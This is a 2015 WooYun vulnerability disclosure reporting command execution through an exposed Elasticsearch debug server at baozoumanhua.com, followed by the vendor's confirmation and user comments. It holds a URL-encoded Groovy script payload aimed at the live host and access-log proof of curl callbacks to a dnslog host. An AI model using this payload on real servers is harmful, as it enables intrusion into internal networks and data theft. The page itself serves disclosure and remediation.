当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099474

漏洞标题:暴走漫画命令执行漏洞可以入内网

相关厂商:baozoumanhua.com

漏洞作者: 路人甲

提交时间:2015-03-04 16:12

修复时间:2015-04-18 16:14

公开时间:2015-04-18 16:14

漏洞类型:命令执行

危害等级:高

自评Rank:11

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-04: 细节已通知厂商并且等待厂商处理中
2015-03-04: 厂商已经确认,细节仅向厂商公开
2015-03-14: 细节向核心白帽子及相关领域专家公开
2015-03-24: 细节向普通白帽子公开
2015-04-03: 细节向实习白帽子公开
2015-04-18: 细节向公众公开

简要描述:

你猜是什么呢

详细说明:

http://debug.baozoumanhua.com:9200/_search?source=%7B%0A%22size%22%3A1%2C%0A%22script_fields%22%3A%20%7B%0A%20%20%20%20%22lupin%22%3A%20%7B%0A%20%20%20%20%20%20%20%20%22script%22%3A%20%22java.lang.Math.class.forName%28%5C%22java.lang.Runtime%5C%22%29%22%2C%22lang%22%3A%22groovy%22%0A%20%20%20%20%7D%0A%20%7D%0A%7D


漏洞证明:

[04/Mar/2015:16:10:36 +0800] 122.226.73.188 - - estest.00453d.dnslog.info GET /?testing HTTP/1.1 200 "curl/7.35.0"
[04/Mar/2015:16:10:36 +0800] 122.226.73.188 - - estest.00453d.dnslog.info GET /?testing HTTP/1.1 200 "curl/7.35.0"
[04/Mar/2015:16:10:36 +0800] 122.226.73.188 - - estest.00453d.dnslog.info GET /?testing HTTP/1.1 200 "curl/7.35.0"
[04/Mar/2015:16:10:39 +0800] 122.226.73.188 - - estest.00453d.dnslog.info GET /?testing HTTP/1.1 200 "curl/7.35.0"

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-04 18:19

厂商回复:

多谢白帽子同学

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-04 16:15 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    一开始让我评论你的时候,其实我是拒绝的。我跟大家讲,我拒绝,因为我根本不会评论,大家跟我讲:评完加特技,评论duang~duang~duang~ 我的评论,假的假的是假的,是特技的评论,是乱评的成分,是评论的特技,duang~

  2. 2015-03-04 16:20 | 眯眯眼 ( 普通白帽子 | Rank:304 漏洞数:67 | 精华漏洞数:22 | WooYun认证√ 漏洞审核员)

    elasticsearch test

  3. 2015-03-04 19:01 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    有没有拿到两千名员工的数据?

  4. 2015-03-04 20:58 | 1c3z ( 实习白帽子 | Rank:88 漏洞数:29 | 我读书少,你可别骗我!!!)

    走小厂商,怎么跑到首页了呢?

  5. 2015-03-05 08:31 | 90Snake ( 普通白帽子 | Rank:109 漏洞数:42 | 最大的漏洞就是人)

    @1c3z 是大厂商吧

  6. 2015-04-18 16:25 | Fire ant ( 实习白帽子 | Rank:73 漏洞数:26 | 他们回来了................)

    你TM在逗我............暴漫居然有这个

  7. 2015-04-20 13:00 | 顾顾顾金威 ( 实习白帽子 | Rank:54 漏洞数:12 | 拉拉拉拉阿拉拉拉)

    有没有看到王尼玛个人资料